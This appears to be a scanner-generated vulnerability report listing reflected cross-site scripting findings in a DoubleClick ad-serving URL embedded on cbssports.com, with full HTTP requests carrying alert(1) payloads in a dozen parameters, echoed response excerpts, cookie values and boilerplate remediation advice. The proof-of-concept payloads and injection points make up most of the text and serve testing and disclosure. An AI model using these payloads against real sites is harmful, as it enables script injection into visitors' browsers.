GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=5071087a7a4"-alert(1)-"f31f2c6fd97&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14624"-alert(1)-"577924b55b4 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=17514624"-alert(1)-"577924b55b4&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2d31"-alert(1)-"628e648557c was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047b2d31"-alert(1)-"628e648557c&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf16f"-alert(1)-"7e369353b08 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21cf16f"-alert(1)-"7e369353b08&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37ee0"-alert(1)-"3d34f88242f was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=5937ee0"-alert(1)-"3d34f88242f&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=5937ee0"-alert(1)-"3d34f88242f&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg= ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73396"-alert(1)-"18438590649 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=73396"-alert(1)-"18438590649&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 22/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=73396"-alert(1)-"18438590649&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&ev ...[SNIP]...
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0fcf"-alert(1)-"47f798ca518 was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=c0fcf"-alert(1)-"47f798ca518&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 3431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=c0fcf"-alert(1)-"47f798ca518&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque ...[SNIP]...
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e43bb"-alert(1)-"1134bc564bc was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=e43bb"-alert(1)-"1134bc564bc&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 6%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=e43bb"-alert(1)-"1134bc564bc&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = ...[SNIP]...
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb41b"-alert(1)-"3856831bc1c was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=fb41b"-alert(1)-"3856831bc1c&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 9/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=fb41b"-alert(1)-"3856831bc1c&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/htt ...[SNIP]...
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d07d0"-alert(1)-"428cd6eea0d was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=d07d0"-alert(1)-"428cd6eea0d&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... m/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=d07d0"-alert(1)-"428cd6eea0d&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; va ...[SNIP]...
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30a1f"-alert(1)-"2ca852a0d31 was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=30a1f"-alert(1)-"2ca852a0d31 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=30a1f"-alert(1)-"2ca852a0d31http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 931fa"-alert(1)-"bfe7ab35173 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn931fa"-alert(1)-"bfe7ab35173&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 40390296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn931fa"-alert(1)-"bfe7ab35173&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.21 ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f38f"-alert(1)-"85e64b01986 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US1f38f"-alert(1)-"85e64b01986&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
